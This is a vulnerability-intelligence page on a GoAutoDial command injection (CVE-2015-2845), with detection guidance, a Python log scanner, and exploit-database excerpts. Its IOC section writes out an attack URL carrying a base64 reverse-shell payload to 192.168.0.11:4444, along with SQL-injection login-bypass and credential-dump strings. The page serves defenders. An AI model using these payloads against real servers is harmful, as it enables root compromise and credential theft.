CVE-2015-2845
Published: 2015-05-12
Priority: P179 · critical · 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 71.69% (99.3th percentile)
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion of the PATH_INFO.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goautodial | goadmin_ce | — | — |
| goautodial | goadmin_ce | — | — |
Detection & IOCs
url: /index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"
- Detect command injection attempts in PATH_INFO targeting the cpanel function: look for URL-encoded pipe/shell metacharacters (e.g., %7C%7C, ||) followed by base64-encoded payloads in requests to /index.php/go_site/cpanel/
- Detect SQLi authentication bypass: POST to /index.php/go_login/validate_credentials with user_pass containing URL-encoded SQL injection string '%20or%20'1'%3D'1' or literal ' OR '1'='1
- Detect SQLi data exfiltration: GET request to /index.php/go_site/go_get_user_info/ with PATH_INFO containing ' OR active='Y to dump admin credentials from the database
- Detect version check reconnaissance: unauthenticated GET request to /changelog.txt; a response body NOT containing '1421902800' indicates a vulnerable GoAutoDial instance
- Detect malicious file upload: filenames matching the pattern go_*.wav.php uploaded to the audiostore endpoint, exploiting insufficient extension validation
- Monitor execution of /usr/share/goautodial/goautodialc.pl with unexpected arguments containing shell metacharacters (||, &&, ;) as this is the underlying exec target for the command injection
- The Metasploit module uses User-Agent 'Mozilla/5.0' with Accept-Encoding 'identity' across all exploit requests; correlate this UA with the specific attack URIs for higher-fidelity detection
- The command injection PoC uses a hardcoded attacker IP (192.168.0.11) and port (4444) in the base64 payload; real-world attacks will use different IPs/ports encoded in base64, so detections must decode and inspect base64 blobs rather than matching the literal example IP
- The Metasploit module hardcodes the payload as a base64-encoded reverse-tcp bash one-liner; the handler must be configured for cmd/unix/reverse_bash to receive the connection
- Any GoAutoDial 3.3 version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable; the fixed version is 3.3-1421902800 identifiable via changelog.txt
- Command injection is executed with root privileges, meaning post-exploitation activity will appear as root; process lineage from goautodialc.pl to bash should be treated as high severity
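The decode-and-inspect approach these notes call for, as an added example (not part of the original page or of any vendor tooling): it URL-decodes each request, isolates the $type portion after /index.php/go_site/cpanel/, and base64-decodes any blob that appears alongside shell metacharacters. The access-log format, the sample lines and the function names are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

CPANEL_PREFIX = "/index.php/go_site/cpanel/"
SHELL_META = re.compile(r"\|\||&&|[;|`]|\$\(")       # shell metacharacters in $type
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # candidate base64 blobs
REQUEST = re.compile(r'"(?:GET|POST) (.+?) HTTP/\d\.\d"')

def inspect_line(line):
    """Return a finding dict for a suspicious cpanel request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path = unquote(m.group(1))                # e.g. %7C%7C becomes ||
    if not path.startswith(CPANEL_PREFIX):
        return None
    type_arg = path[len(CPANEL_PREFIX):]      # the $type portion of PATH_INFO
    if not SHELL_META.search(type_arg):
        return None
    decoded = []
    for token in B64_TOKEN.findall(type_arg):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue                          # not valid base64, skip it
        decoded.append(raw.decode("utf-8", "replace"))
    return {"src": line.split()[0], "type_arg": type_arg, "decoded": decoded}

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines; the blob encodes a harmless marker string.
_BLOB = base64.b64encode(b"echo constructed-sample-only").decode()
_INJECTED = quote(CPANEL_PREFIX + '|| bash -c "eval `echo %s | base64 --decode`"' % _BLOB)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php/go_site/cpanel/constructed-benign HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET %s HTTP/1.1" 200 0' % _INJECTED,
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /changelog.txt HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src"], finding["decoded"])
```

The decoded strings are what an analyst should triage: the callback address and port differ per attack, so they only become visible after decoding.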
Exploit-DB
GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
exploitdb·2017-07-05
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "GoAutoDial 3.3 Authentication Bypass / Command Injection",
'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded
Exploit-DB
GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
exploitdb·2015-04-21·CVSS 10.0
---
Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21
Abstract:
Multiple vulnerabilities exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.
Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.co
Metasploit
GoAutoDial 3.3 Authentication Bypass / Command Injection
metasploit
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. This module has been tested successfully on GoAutoDial version 3.3-1406088000.
- http://goautodial.org/news/21
- http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.html
- http://www.securityfocus.com/archive/1/535319/100/1100/threaded
- http://www.securityfocus.com/bid/74281
- https://www.exploit-db.com/exploits/36807/
- https://www.exploit-db.com/exploits/42296/